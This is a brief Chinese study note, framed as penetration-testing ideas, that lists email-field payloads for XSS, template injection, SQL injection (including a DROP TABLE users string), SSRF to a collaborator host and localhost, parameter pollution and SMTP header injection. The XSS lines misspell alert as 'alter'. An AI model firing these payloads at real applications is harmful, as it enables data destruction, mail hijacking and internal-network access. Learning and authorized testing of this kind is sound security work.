Sqli學習筆記系列-遇到與郵箱相關的功能的測試思路(payload)

主要測試思路

• xss:

test+(<script>alter(0)</script>)@example.com
test@example(<script>alter(0)</script>).com
"<script>alter(0)</script>"@example.com

• 模板注入:

"<%= 7 * 7>"@example.com
test+(${{7*7}})@example.com

• SQLi

"'OR1=1--'"@example.com
"mail);DROP TABLE users;--"@example.com

• SSRF

richard.o1o1@abc123.burpcollaborator.net
richard.o1o1@[127.0.0.1]

• 參數污染

victim&email=attacker@example.com

• Header注入

"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com